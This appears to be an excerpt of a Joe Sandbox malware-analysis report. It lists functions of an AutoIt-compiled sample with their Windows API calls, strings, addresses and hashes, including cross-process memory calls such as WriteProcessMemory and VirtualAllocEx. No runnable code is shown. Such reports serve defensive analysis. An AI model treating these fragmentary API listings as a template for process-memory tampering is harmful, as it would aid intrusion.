Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memmove
String ID: 3c:$_:
API String ID: 4104443479-3871541621
Opcode ID: 9593f89ad1dc3fb63e64fca9b11527de383902625603f6386bb6b8a8aa45f412
Instruction ID: 51718ed55be209007000ec610ef662e045772240c434bf3d9f088cb014dc70db
Opcode Fuzzy Hash: 9593f89ad1dc3fb63e64fca9b11527de383902625603f6386bb6b8a8aa45f412
Instruction Fuzzy Hash: F4519D719006099FCB26CF68D880AAEBBB5FF45304F14852AE85AD7350EB30F965CB51

Function 003E97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003F14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003E9296,?,?,00000034,00000800,?,00000034), ref: 003F14E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003E983F

Part of subcall function 003F1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003E92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 003F14B1

Part of subcall function 003F13DE: GetWindowThreadProcessId.USER32(?,?), ref: 003F1409
Part of subcall function 003F13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003E925A,00000034,?,?,00001004,00000000,00000000), ref: 003F1419
Part of subcall function 003F13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003E925A,00000034,?,?,00001004,00000000,00000000), ref: 003F142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003E98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003E98F9

Strings

@, xrefs: 003E9911

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: ffc130c73542df9637efe321cfcf2b0f26f69cb636ff28ad9ae651c6dd965c51
Instruction ID: bcecf5f7d89ae191e3801ca1ab627d3565d1fce892a0a3473cae33c32c8a3d14
Opcode Fuzzy Hash: ffc130c73542df9637efe321cfcf2b0f26f69cb636ff28ad9ae651c6dd965c51
Instruction Fuzzy Hash: 9F416F7690021CBFCB11DFA5CD81BEEBBB8EB49300F004199FA45BB191DA706E45CBA0

Function 00417946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0041F910,00000000,?,?,?,?), ref: 004179DF
GetWindowLongW.USER32 ref: 004179FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00417A0C

Strings

SysTreeView32, xrefs: 004179B1

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 9ef118b8dd6b4986793907ac4dea44b053336fe6f0c3df4b69d260c7f1510c37
Instruction ID: 3f632e6daf7bf5baa771e9f7c6b17a13b712b3a88e1baa8b1c7fe9de89e96513
Opcode Fuzzy Hash: 9ef118b8dd6b4986793907ac4dea44b053336fe6f0c3df4b69d260c7f1510c37
Instruction Fuzzy Hash: B231CE71204606ABEF118E38CC41BEB77A9EF09364F248726F875A22E1D734E9958B54

Function 004173D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00417461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00417475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00417499

Strings

SysMonthCal32, xrefs: 0041742C

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: fb30d1de9b1505a23db873c26498464622f281e8417e1a2fcec3f702d428b652
Instruction ID: 730e1f70d5ad4ecec0c8d452334328405d47823fd1057cc1aa820a580e721833
Opcode Fuzzy Hash: fb30d1de9b1505a23db873c26498464622f281e8417e1a2fcec3f702d428b652
Instruction Fuzzy Hash: F421BF32500218BBDF11CF64CC42FEB3B79EB48724F110215FE15AB190DA79AC919BA4

Function 00417B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00417C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00417C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00417C5F

Strings

msctls_updown32, xrefs: 00417BC4

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 82dc8e05fb1755c440ead6f584518d9c619b42791dad78bb406fc086b8bb6429
Instruction ID: 0569ca9ad7e0f134e9d751a90752a40bbdb4b388ef16f92fdcd32784b06a12e2
Opcode Fuzzy Hash: 82dc8e05fb1755c440ead6f584518d9c619b42791dad78bb406fc086b8bb6429
Instruction Fuzzy Hash: 18217CB5204208AFDB11DF24DCC1DB737ACEB49398B14405AFA059B3A1DB35EC528BA4

Function 00416CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00416D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00416D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00416D70

Strings

Listbox, xrefs: 00416D08

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 138bfcf5144841fcbd738b73a6fbe02e3816d9a59c373679d48eca09f5206685
Instruction ID: b5c6832278d5cf6ba0cbd7ccff4206f6627372ee490fc906ffaa2b8fbf2868d6
Opcode Fuzzy Hash: 138bfcf5144841fcbd738b73a6fbe02e3816d9a59c373679d48eca09f5206685
Instruction Fuzzy Hash: 9C21B032600118BFEF118F54DC45EFB3BBAEB89764F028129F9459B2A0C675DC9297A4

Function 004039E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00403A66

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

Strings

AUTOITCALLVARIABLE%d, xrefs: 00403A58
%B, xrefs: 004039F4
, $, xrefs: 00403AA6

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d$%B
API String ID: 3506404897-1212537876
Opcode ID: 9089d54f754a397bb51a6383f846721670a2ba90a17744e5d7826d4e5289430b
Instruction ID: 471d042db37bd1e4478eb6f2c1c96e83ad80027a2ea118a96e1cba53968770f0
Opcode Fuzzy Hash: 9089d54f754a397bb51a6383f846721670a2ba90a17744e5d7826d4e5289430b
Instruction Fuzzy Hash: B4219331700119ABCF15EF64CC82AAE7BB9AF45700F50046AF445BB1C1DB38EA45CF69

Function 0041770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00417772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00417787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00417794

Strings

msctls_trackbar32, xrefs: 00417749

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 78d597d4e583345d1e0f51dc88a39c33c94ec059c92ffa65d4454601d18117c8
Instruction ID: 2d8956deed2cafc964fdd9519bfe434fc9f5c39a1204a52514f751223289a4e0
Opcode Fuzzy Hash: 78d597d4e583345d1e0f51dc88a39c33c94ec059c92ffa65d4454601d18117c8
Instruction Fuzzy Hash: 36112332240208BAEF209F61CC01FEB37B9EF88B64F114129FA55A61D0C272E851CB24

Function 003B6B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 003B6B93
__calloc_crt.LIBCMT ref: 003B6BAC

Strings

D, xrefs: 003B6BD1
@BE, xrefs: 003B6BC3

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: __calloc_crt
String ID: D$@BE
API String ID: 3494438863-2015448474
Opcode ID: 0b8bf8f7bb084f41ce3a0aa86be66ecf004a47b5f31ec66ab269dc7f0c3c8f72
Instruction ID: aa76a32750058acf770f12e2a8b74e7b1e41b2cf3e7c5e2cb4bab1b28589d691
Opcode Fuzzy Hash: 0b8bf8f7bb084f41ce3a0aa86be66ecf004a47b5f31ec66ab269dc7f0c3c8f72
Instruction Fuzzy Hash: 08F031712047119AF765CF56BC62AE627A8E700728F500466F700CE992EB68D8418B89

Function 003B9B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 003B9B94

Part of subcall function 003B9C0B: __mtinitlocknum.LIBCMT ref: 003B9C1D
Part of subcall function 003B9C0B: EnterCriticalSection.KERNEL32(00000000,?,003B9A7C,0000000D), ref: 003B9C36

__updatetlocinfoEx_nolock.LIBCMT ref: 003B9BA4

Part of subcall function 003B9100: ___addlocaleref.LIBCMT ref: 003B911C
Part of subcall function 003B9100: ___removelocaleref.LIBCMT ref: 003B9127
Part of subcall function 003B9100: ___freetlocinfo.LIBCMT ref: 003B913B

Strings

8D, xrefs: 003B9B85
8D, xrefs: 003B9B8A, 003B9B9F, 003B9BAB

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
String ID: 8D$8D
API String ID: 547918592-939907393
Opcode ID: dc9319a854c54e9749d59a628cddd17204c91b1bdb528d514766dc48e596839c
Instruction ID: a79d33bdde465ebf7cebae30672ea0086a5d1a82a8e5aea0b9cccd2660c91c3b
Opcode Fuzzy Hash: dc9319a854c54e9749d59a628cddd17204c91b1bdb528d514766dc48e596839c
Instruction Fuzzy Hash: 35E08C31983300AAFA22FBE9A903B883664EB01B29F20016BF345594C1CE782400C61F

Function 00394C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00394B83,?), ref: 00394C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00394C56

Strings

kernel32.dll, xrefs: 00394C3F
Wow64RevertWow64FsRedirection, xrefs: 00394C50

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 38e65f73a289646da8afb3d058597fee2ad15558154e3ab0f8a618dbaa98690c
Instruction ID: ab95a8f2883efb91cd3f374542115ea5c8deb683782c64b85939fa7b5035f766
Opcode Fuzzy Hash: 38e65f73a289646da8afb3d058597fee2ad15558154e3ab0f8a618dbaa98690c
Instruction Fuzzy Hash: 4AD02E30504B23EFDB208F31D808B8A73E4AF01340B22C83ED49AC6268E778D8C1CA14

Function 00394C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00394BD0,?,00394DEF,?,004552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00394C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00394C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 00394C1D
kernel32.dll, xrefs: 00394C0C

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 55c564344fe98cda63178036efaaff0f934f0c3707941bd687a1b31ece804a25
Instruction ID: bd44159c3878998f2099ac5653dbc6b07c9b1160d73c1a6a8963a2dec109e8b3
Opcode Fuzzy Hash: 55c564344fe98cda63178036efaaff0f934f0c3707941bd687a1b31ece804a25
Instruction Fuzzy Hash: 00D0C230500713EFDB205F70D808746B6D5EF08342B11CC3A9485C2160E7B4D882CA14

Function 00410DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00411039), ref: 00410DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00410E07

Strings

RegDeleteKeyExW, xrefs: 00410E01
advapi32.dll, xrefs: 00410DF0

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 5adeb92f018ad5ac72659eb9971cbe29e7b41c2fd041f3cafd4ce9c48607d09e
Instruction ID: f322ad55550e73acd7edddc4931f1358b65c89fac693ec8d908a36e216b53842
Opcode Fuzzy Hash: 5adeb92f018ad5ac72659eb9971cbe29e7b41c2fd041f3cafd4ce9c48607d09e
Instruction Fuzzy Hash: 4FD0E271610722EFE7209B76C8087877AE5AF04352F21CC3EA48AD2650E7B8D8D08A58

Function 004090E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00408CF4,?,0041F910), ref: 004090EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00409100

Strings

kernel32.dll, xrefs: 004090E9
GetModuleHandleExW, xrefs: 004090FA

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 1f06efe39455821498c2d53c413545a04739961eecf744ebfa25e9b1cce574c7
Instruction ID: ec8f7a714c1de4af3e51073bab71b1e3a9c4f461940be7fa36208951368ca735
Opcode Fuzzy Hash: 1f06efe39455821498c2d53c413545a04739961eecf744ebfa25e9b1cce574c7
Instruction Fuzzy Hash: 45D01234614723EFE7209F31D81864776D4AF05351B11C83FD486D6691E7B8DC84C654

Function 003D1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 003D1718
__swprintf.LIBCMT ref: 003D1749

Strings

WIN_XPe, xrefs: 003D1788
%.3d, xrefs: 003D1723

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: de5b8a5dff419588438b86c31019c198c0710af9ebd9adb74ffb0430841b68fa
Instruction ID: 2c25049da4ec77d4bc2f550ef3a3f712b514e439a489923240cdab75f185848a
Opcode Fuzzy Hash: de5b8a5dff419588438b86c31019c198c0710af9ebd9adb74ffb0430841b68fa
Instruction Fuzzy Hash: D6D05B73804118FBCB06D7D0AC88DF9777CA708301F140563F502D2960E2759B54E625

Function 003E717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b830bf0d74108d64e528e2530fe07e4112e87c9009b33f30ac4314347079c73
Instruction ID: 2b5c15ad3ec4c59c23e1c88e9ab77094e055059dbc4722c5553ec9d55f65efe5
Opcode Fuzzy Hash: 7b830bf0d74108d64e528e2530fe07e4112e87c9009b33f30ac4314347079c73
Instruction Fuzzy Hash: F6C18174A04266EFDB15CF96C884EAEBBB5FF48304B158698E805DB391D730ED41DB90

Function 0040E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0040E0BE
CharLowerBuffW.USER32(?,?), ref: 0040E101

Part of subcall function 0040D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0040D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0040E301
_memmove.LIBCMT ref: 0040E314

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: d1d6b505c6bd16a5efb63c39876ead482c382db363374b993821342e5b66280b
Instruction ID: 9b85c7072f0da6ed4ec381ec0255613488b2f0d67cd6334f321bbde22b09e9fc
Opcode Fuzzy Hash: d1d6b505c6bd16a5efb63c39876ead482c382db363374b993821342e5b66280b
Instruction Fuzzy Hash: 00C17A71608301CFC705DF29C480A6ABBE4FF89314F04896EF999AB391D734E946CB86

Function 00408093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004080C3
CoUninitialize.OLE32 ref: 004080CE

Part of subcall function 003ED56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003ED5D4

VariantInit.OLEAUT32(?), ref: 004080D9
VariantClear.OLEAUT32(?), ref: 004083AA

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 10a9512b5f329dd79094671146d23832bcdc6eadaade95be2e1a4d3f4643bfd9
